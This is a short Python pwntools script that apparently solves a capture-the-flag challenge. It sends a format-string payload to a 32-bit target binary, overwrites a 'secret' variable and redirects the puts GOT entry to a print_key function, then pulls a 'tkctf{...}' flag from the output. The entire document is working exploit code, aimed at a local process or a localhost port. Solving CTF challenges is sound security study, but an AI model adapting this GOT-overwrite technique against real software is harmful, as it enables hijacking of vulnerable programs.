#!/usr/bin/env python3

import os
import re
import sys

from pwn import *

context.arch = "x86"
context.bits = 32

def exploit(p, elf):
    secret = elf.symbols["secret"]
    puts = elf.got["puts"]
    print_key = elf.symbols["print_key"]
    writes = {secret: 0xc0ffee, puts: print_key}
    payload = b"BB" + fmtstr_payload(15, writes, 20, write_size="short")
    print("sizeof(payload) = %d" % len(payload))
    p.sendline(payload)
    return p.readall()

def parse_flag(out):
    m = re.search(b"(tkctf{[^}]+})", out)
    assert m is not None
    return m.groups()[0]

if __name__ == '__main__':
    ROOT = os.path.abspath(os.path.dirname(__file__))
    b = os.path.abspath(os.path.join(ROOT, "../docker/target"))
    elf = ELF(b)

    if "REMOTE" in os.environ:
        if not "PORT" in os.environ:
            print("[!] Please specify the port number")
            exit(1)
        p = remote("localhost", int(os.environ["PORT"]))
    else:
        p = process(b, cwd=os.path.dirname(b))

    out = exploit(p, elf)
    print(parse_flag(out))
